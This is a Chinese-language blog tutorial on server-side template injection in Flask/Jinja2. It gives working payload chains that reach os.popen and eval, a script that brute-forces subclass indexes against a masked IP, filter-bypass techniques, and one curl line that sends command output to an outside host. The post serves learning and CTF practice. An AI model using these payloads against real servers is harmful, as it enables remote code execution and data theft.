<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Ex1Le23">





<title>服务器端模板注入（SSTI） | Stuuupid&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Stuuupid&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Stuuupid&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">服务器端模板注入（SSTI）</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Ex1Le23</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">December 6, 2022&nbsp;&nbsp;0:29:59</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E6%B8%97%E9%80%8F%EF%BC%9A%E4%BB%8E0%E5%88%B01/">渗透：从0到1</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>#一、SSTI简介<br>SSTI， 即 <strong>Server-Side Template Injection，服务器端模板注入</strong>。</p>
<p>##1、SSTI产生原因<br>在MVC框架中，用户的输入通过 View 接收，交给 Controller ，然后由 Controller 调用 Model 或者其他的 Controller 进行处理，最后再返回给View ，这样就最终显示在我们的面前了，那么这里的 <strong>View</strong> 中就会大量地用到一种叫做<strong>模板</strong>的技术。<br>绕过服务端接收了用户的恶意输入后，<strong>未经任何处理</strong>就将其作为web应用模板内容的一部分，而模板引擎在<strong>进行目标编译渲染</strong>的进程中，执行了用户恶意攻击者插入的可以破坏模板的语句，就会导致信息泄露、代码执行、GetShell等问题。</p>
<blockquote>
<p><strong>网站模板引擎:</strong><br>模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，用于网站的模板引擎就会生成一个标准的HTML文档。<br>模板引擎可以让（网站）程序实现界面与数据分离，业务代码与逻辑代码的分离，这就大大提升了开发效率，良好的设计也使得代码重用变得更加容易。</p>
</blockquote>
<blockquote>
<p>现行的模板引擎有:<br>PHP 的     Smarty, Twig, Blade.<br>Java 的    JSP, FreeMareker, Velocity.<br>Python 的  Flask(Jinja2), django, tornado<br>……</p>
</blockquote>
<p>简单来说，可以理解为利用模板引擎来生成前端的HTML代码。模板引擎会会提供一套生成HTML代码的程序，然后只需要获取用户的数据，将其放到渲染函数里，最后生成模板+用户数据的前端HTML页面，反馈给浏览器，从而呈现在用户面前。当这里的“用户的数据”具有恶意攻击性而又不被处理时，SSTI就发生了。</p>
<p>##2、SSTI检测工具 Tplmap</p>
<blockquote>
<p>工具地址:<a target="_blank" rel="noopener" href="https://github.com/epinna/tplmap">https://github.com/epinna/tplmap</a><br>安装教程:<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ktsm/p/15691652.html">https://www.cnblogs.com/ktsm/p/15691652.html</a><br>使用教程：<a target="_blank" rel="noopener" href="https://blog.csdn.net/EC_Carrot/article/details/109709767">https://blog.csdn.net/EC_Carrot/article/details/109709767</a></p>
</blockquote>
<p>【参考资料：**<a target="_blank" rel="noopener" href="https://blog.csdn.net/LYJ20010728/article/details/120205725">详解SSTI模板注入</a>**】</p>
<p>#二、SSTI 利用</p>
<blockquote>
<p>以Flask（Jinja2）为例（windows），该版块仅涉及主机上的python语法</p>
</blockquote>
<p>##Ⅰ. 基础知识<br>###1、Python 内建函数<br>启动 python 解释器时，即使没有创建任何变量或函数还是会有很多函数可供使用，这些就是 python 的内建函数。在 Python 交互模式下，使用命令 <code>dir(&#39;builtins&#39;)</code> 即可查看当前 Python 版本的一些内建变量、内建函数，<strong>内建函数可以调用一切函数</strong>。<br>###2、Python 类继承<br>Python 中一切皆为对象，均继承于 object 对象，Python 中的 object 类中集成了很多的基础函数，假如需要在 payload 中使用某个函数就需要用 object 去操作。</p>
<p>常见的<strong>继承关系</strong>有以下三种：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1. base ：对象的一个基类，一般是object</span><br><span class="line">2. mro  ：获取对象的基类，只是这时会显示整个继承链的关系，是一个列表，而object在最列表的最顶层，通过mro[-1]可以获取到</span><br><span class="line">3. subclasses() : 继承此对象的子类，返回一个列表</span><br></pre></td></tr></table></figure>
<p>##Ⅱ. 构造payload<br><br></p>
<p><strong>攻击方式为：变量-&gt;对象-&gt;基类-&gt;子类遍历-&gt;全局变量</strong></p>
<p>###1、相关属性</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">对于返回的是类实例：</span><br><span class="line">1. __class__            //返回实例的对象，可以使实例指向class，从而使用下面的魔术方法</span><br><span class="line">如：</span><br><span class="line">&gt;&gt;&gt;&#x27;&#x27;.__class__  </span><br><span class="line">&lt;class &#x27;str&#x27;&gt;</span><br><span class="line"></span><br><span class="line">对于返回的是定义的class类：</span><br><span class="line">2. __base__              //返回类的父亲 python3</span><br><span class="line">3. __mro__               //返回类继承的元组，即寻找父类 python3</span><br><span class="line">4. __subclasses__()      //返回类中仍然可用的引用，可以此获取想要的类的对象 python3</span><br><span class="line">如：</span><br><span class="line">&gt;&gt;&gt; &#x27;&#x27;.__class__.__mro__[-1].__subclasses__()[138]  </span><br><span class="line">&lt;class &#x27;os._wrap_close&#x27;&gt;   </span><br><span class="line">Tip：根据索引值来获取想用的可利用类,不加索引会输出全部存活的引用</span><br><span class="line"></span><br><span class="line">5. __builtins__          //作为默认初始模块出现，可用于查看当前所有导入的内建函数</span><br><span class="line">6. __globals__           //对包含函数全局变量的字典的引用。如果某个文件调用了os、sys等库，但我们只能访问该文件某个函数或者某个对象，那么我们就可以利用globals属性访问全局的变量 python3</span><br><span class="line">7. __init__              //返回类的初始化方法</span><br><span class="line">如：</span><br><span class="line">&gt;&gt;&gt; &#x27;&#x27;.__class__.__bases__[0].__subclasses__()[38].__init__</span><br><span class="line">&lt;slot wrapper &#x27;__init__&#x27; of &#x27;object&#x27; objects&gt;</span><br><span class="line">Tip: &#x27;wrapper&#x27;是指这些函数并没有被重载，这时他们并不是function，不具有__globals__属性</span><br></pre></td></tr></table></figure>
<p>###2、一个简单的payload寻找过程<br>####Ⅰ. 找到<code>__globals__</code>全局<br>根据上述属性，找到重载过的 <code>__init__</code> 类（在获取初始化属性后，带 <code>wrapper</code> 的说明没有重载，因此寻找**<code>不带 warpper</code>** 的即可），并通过 <code>__globals__</code> 全局来查找所有的方法及变量及参数，或者获取 <code>file</code> 、 <code>os</code> 等模块以进行下一步的利用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; &#x27;&#x27;.__class__.__bases__[0].__subclasses__()[138].__init__</span><br><span class="line">&lt;function _wrap_close.__init__ at 0x0000025AA50BAEE0&gt;</span><br></pre></td></tr></table></figure>
<p>####Ⅱ. 查看其引用<code>__builtins__</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&#x27;.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__[&#x27;__builtins__&#x27;]            </span><br><span class="line">Tip：这里会返回 dict 类型，寻找 keys 中可用函数，使用 keys 中的 file 等函数来实现读取文件的功能</span><br></pre></td></tr></table></figure>
<p><img src="https://img2022.cnblogs.com/blog/2933309/202209/2933309-20220915221230348-826204857.png"></p>
<p>####Ⅲ. 使用可利用函数实现文件读取功能等<br><code>&#39;&#39;.__class__.__mro__[-1].__subclasses__()[138].__init__.__globals__[&#39;__builtins__&#39;][&#39;file&#39;](&#39;/etc/passwd&#39;).read() </code><br>###3、常用的目标函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">file</span><br><span class="line">subprocess.Popen</span><br><span class="line">os.popen</span><br><span class="line">exec</span><br><span class="line">eval</span><br></pre></td></tr></table></figure>
<blockquote>
<p>几个含有<code>eval</code>函数的类：<br>warnings.catch_warnings<br>WarningMessage<br>codecs.IncrementalEncoder<br>codecs.IncrementalDecoder<br>codecs.StreamReaderWriter<br>os._wrap_close<br>reprlib.Repr<br>weakref.finalize<br>……</p>
</blockquote>
<p>###4、命令执行<br>Python常用的三种<strong>命令执行</strong>方式：</p>
<blockquote>
<p><code>os.system()</code><br>该方法的参数就是 string 类型的命令，在 linux 上返回值为执行命令的 exit 值；而windows上返回值则是运行命令后 shell 的返回值；注意：该函数返回命令<strong>执行结果的返回值</strong>，并不是返回命令的执行输出（执行成功返回0，失败返回-1），因此需要配合 curl 外带数据查看回显          #这里画个问号 </p>
</blockquote>
<blockquote>
<p><code>os.popen()</code><br>返回的是 file read 的对象，如果想获取执行命令的输出，则需要调用该对象的 read() 方法</p>
</blockquote>
<blockquote>
<p>直接寻找 <code>os</code> 模块执行命令<br>先编写脚本遍历Python中含有os模块的类的索引号，然后选取其中一个构造payload执行命令，脚本如下：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    &#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36&#x27;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">for i in range(500):</span><br><span class="line">    url = &quot;http://47.xxx.xxx.72:8000/?name=&#123;&#123;().__class__.__bases__[0].__subclasses__()[&quot;+str(i)+&quot;].__init__.__globals__&#125;&#125;&quot;</span><br><span class="line"></span><br><span class="line">    res = requests.get(url=url, headers=headers)</span><br><span class="line">    if &#x27;os.py&#x27; in res.text:</span><br><span class="line">        print(i)</span><br></pre></td></tr></table></figure>
<br>

<p>用例:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&#x27;.__class__.__mro__[-1].__subclasses__()[138].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;)</span><br><span class="line">Tip: 需要导入os模块</span><br><span class="line">&#x27;&#x27;.__class__.__mro__[-1].__subclasses__()[138].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read()&quot;)</span><br><span class="line">Tip: 需要导入os模块</span><br><span class="line"></span><br><span class="line">&#x27;&#x27;.__class__.__mro__[-1].__subclasses__()[79].__init__.__globals__[&#x27;os&#x27;].popen(&#x27;dir&#x27;).read()</span><br></pre></td></tr></table></figure>

<p>我们可以看到，即使是使用os模块执行命令，其也是调用的os模块中的popen函数，那我们也可以直接调用popen函数，存在popen函数的类一般是 <code>os._wrap_close</code>，但也不绝对。由于目标Python环境的不同，我们还需要遍历一下。<br><br></p>
<blockquote>
<p>事实上，在本地python环境下，可以直接在<code>os._wrap_close</code>找到popen函数：<br><code>&#39;&#39;.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__[&#39;popen&#39;](&#39;dir&#39;).read()</code></p>
</blockquote>
<p>【参考资料：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9584#toc-17">以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用</a>】</p>
<p>#三、模板注入绕过<br>##1、语法<br>官方文档对于模板的部分语法介绍如下（仍然以jinja2为例：<a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/2.11.x/templates/">Template Designer Documentation</a>）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.</span><br><span class="line">&#123;% ... %&#125; for Statements </span><br><span class="line">可用来声明变量，也可用以循环语句和条件语句</span><br><span class="line">&#123;&#123; ... &#125;&#125; for Expressions to print to the template output</span><br><span class="line">用于将表达式打印到模板输出</span><br><span class="line">&#123;# ... #&#125; for Comments not included in the template output</span><br><span class="line">表示未包含在模板输出中的注释</span><br><span class="line">#  ... # for Line Statements</span><br><span class="line">## 可以有和 &#123;%%&#125; 相同的效果</span><br><span class="line"></span><br><span class="line">2.</span><br><span class="line">You can use a dot (.) to access attributes of a variable in addition to the standard Python __getitem__ “subscript” syntax ([]). --官方原文</span><br><span class="line">可以用 . 或者 [] 来访问变量的属性，也就是说</span><br><span class="line">&#123;&#123;&quot;&quot;.__class__&#125;&#125;  等价于  &#123;&#123;&quot;&quot;[&#x27;__classs__&#x27;]&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>因此，当<code>.</code>被过滤时，我们可以使用<code>[]</code>以绕过。</p>
<blockquote>
<ol start="3">
<li>如果想调用字典中的键值，其本质其实是调用了魔术方法<code>__getitem__</code></li>
</ol>
</blockquote>
<p>所以对于取<strong>字典中键值</strong>的情况不仅可以用<code>[]</code>，也可以用<code>__getitem__</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[&#x27;__builtins__&#x27;]&#125;&#125;</span><br><span class="line">&#123;&#123;url_for.__globals__.__getitem__(&#x27;__builtins__&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<ol start="4">
<li>调用对象的方法，具体是调用了魔术方法<code>__getattribute__</code></li>
</ol>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&quot;.__class__</span><br><span class="line">&quot;&quot;.__getattribute__(&quot;__class__&quot;)</span><br></pre></td></tr></table></figure>
<blockquote>
<ol start="5">
<li><strong><code>lipsum</code></strong><br><strong>flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：</strong></li>
</ol>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line">#在CTF中很好用</span><br></pre></td></tr></table></figure>
<p>【参考资料：<a target="_blank" rel="noopener" href="https://lazzzaro.github.io/2020/05/15/web-SSTI/">SSTI</a>】<br>##2、绕过<br>###Ⅰ. 字符串<br>1、拼接<br><code>&quot;cla&quot;+&quot;ss&quot;</code><br>2、反转<br><code>&quot;__ssalc__&quot;[::-1]</code><br>3、编码绕过（ASCII码、Unicode编码等）<br>4、利用chr函数<br>因为我们没法直接使用chr函数，所以需要通过<code>__builtins__</code>找到他</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set chr=url_for.__globals__[&#x27;__builtins__&#x27;].chr %&#125;</span><br><span class="line">&#123;&#123;&quot;&quot;[chr(95)%2bchr(95)%2bchr(99)%2bchr(108)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(95)%2bchr(95)]&#125;&#125;  //%2b为 + ，拼接字符串</span><br><span class="line">==&gt;&#123;&#123;&quot;&quot;.__class__&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>5、在jinja2里面可以利用<code>~</code>进行拼接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set a=&#x27;__cla&#x27; %&#125;&#123;%set b=&#x27;ss__&#x27;%&#125;&#123;&#123;&quot;&quot;[a~b]&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>6、大小写过滤转换<br>###Ⅱ. 过滤器</p>
<blockquote>
<p>在模板中, 过滤器相当于一个函数, 把当前的变量传入到过滤器中, 然后过滤器根据自身功能, 再返回对应的值, 之后再把结果渲染到页面中<br>基本语法: <code>&#123;&#123; 变量 | 过滤器名称 &#125;&#125; </code>使用管道符号<code>|</code>进行组合，可以链接多个过滤器。一个过滤器的输出应用于下一个过滤器。</p>
</blockquote>
<p>常用的过滤器：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">1. attr</span><br><span class="line">#用于获取变量，可用于. [] 都被过滤的情况</span><br><span class="line">&quot;&quot;|attr(&quot;__class__&quot;) &lt;==&gt; &quot;&quot;.__class__</span><br><span class="line">2. format</span><br><span class="line">#格式化字符串</span><br><span class="line">&quot;%c%c%c%c%c%c%c%c%c&quot;|format(95,95,99,108,97,115,115,95,95)  </span><br><span class="line">&lt;==&gt;  </span><br><span class="line">&quot;__class__&quot;</span><br><span class="line">3. join</span><br><span class="line">#将一个序列拼接成一个字符串，join (&#x27;|&#x27;)将令每一个元素被&#x27;|&#x27;隔开</span><br><span class="line">&quot;&quot;[[&#x27;__clas&#x27;,&#x27;s__&#x27;]|join] 或者 &quot;&quot;[(&#x27;__clas&#x27;,&#x27;s__&#x27;)|join]</span><br><span class="line">&lt;==&gt;</span><br><span class="line">&quot;&quot;[&quot;__class__&quot;]</span><br><span class="line">4. lower</span><br><span class="line">#转换成小写</span><br><span class="line">5. replace</span><br><span class="line">#替换字符串</span><br><span class="line">&quot;__claee__&quot;|replace(&quot;ee&quot;,&quot;ss&quot;) 构造出字符串 &quot;__class__&quot;</span><br><span class="line">&quot;__ssalc__&quot;|reverse 构造出 &quot;__class__&quot;</span><br><span class="line">6. string</span><br><span class="line">#将变量转换为字符串，这样就可以通过浏览器显示的符号构造出我们可利用的字符串、符号等</span><br><span class="line">().__class__   出来的是&lt;class &#x27;tuple&#x27;&gt;</span><br><span class="line">().__class__|string)[0] 出来的是&lt;</span><br><span class="line">7. list</span><br><span class="line">#转换成列表，可以与上面的string配合，就可以调用列表里面的方法取字符了</span><br><span class="line">(()|select|string|list).pop(0)</span><br></pre></td></tr></table></figure>
<p>【资料查阅：<a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/110220425">SSTI模板注入绕过（进阶篇）</a>】<br>###Ⅲ. 关键字绕过</p>
<ol>
<li><code>.</code>和<code>[]</code><blockquote>
<p>可用过滤器<code>attr</code>绕过，若<code>.</code>可用，还可以<code>__getitem__</code>绕过<code>[]</code>。</p>
</blockquote>
</li>
<li><code>&quot;&quot;</code>和<code>_</code>绕过<blockquote>
<p><code>request.args</code>、<code>request.values</code>、<code>request.cookies</code> 是 flask 中的属性，为返回请求的参数，这里把path当作变量名，将后面的路径传值进来进而绕过了引号的过滤<br><code>&#123;&#123;().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read()&#125;&#125;&amp;path=/etc/passwd </code><br><code>&#123;&#123; ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() &#125;&#125;&amp;class=__class__&amp;mro=__mro__&amp;subclasses=__subclasses__ </code></p>
</blockquote>
</li>
<li><code>&#123;&#123;&#125;&#125;</code>绕过<blockquote>
<p>用<code>&#123;%%&#125;</code>的左半边绕过</p>
</blockquote>
</li>
</ol>
<p><code>&#123;% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=`whoami` ').read()=='p' %&#125;1&#123;% endif %&#125;</code></p>
<p>#四、SSTI检测<br>##1、Tplmap<br>##2、附表<br><img src="https://img2022.cnblogs.com/blog/2933309/202209/2933309-20220916005446865-111172183.png"><br>使用标志测试。如jinja2：<code>&#123;&#123;7+8&#125;&#125;</code>，如果输出<code>15</code>，则有可能存在SSTI漏洞。<br><img src="https://img2022.cnblogs.com/blog/2933309/202209/2933309-20220916011329647-1428250087.png"><br>&lt;图源: <a target="_blank" rel="noopener" href="https://www.cnblogs.com/icez/archive/2018/04/07/ssti_check_payload.html&gt;">https://www.cnblogs.com/icez/archive/2018/04/07/ssti_check_payload.html&gt;</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Ex1Le23</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://ex1le23.github.io/2022/12/06/%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%EF%BC%88SSTI%EF%BC%89/">https://ex1le23.github.io/2022/12/06/%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%EF%BC%88SSTI%EF%BC%89/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/web/"># web</a>
                    
                        <a href="/tags/%E6%B8%97%E9%80%8F/"># 渗透</a>
                    
                        <a href="/tags/%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/"># 常见漏洞</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2022/12/06/2022DASCTF-Sept-X-%E6%B5%99%E6%B1%9F%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%E7%A7%8B%E5%AD%A3%E6%8C%91%E6%88%98%E8%B5%9B-web/">2022DASCTF Sept X 浙江工业大学秋季挑战赛 web</a>
            
            
            <a class="next" rel="next" href="/2022/12/06/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/">XSS跨站脚本攻击</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Ex1Le23 | Always Hold the Belief.</span>
    </div>
</footer>

    </div>
</body>

</html>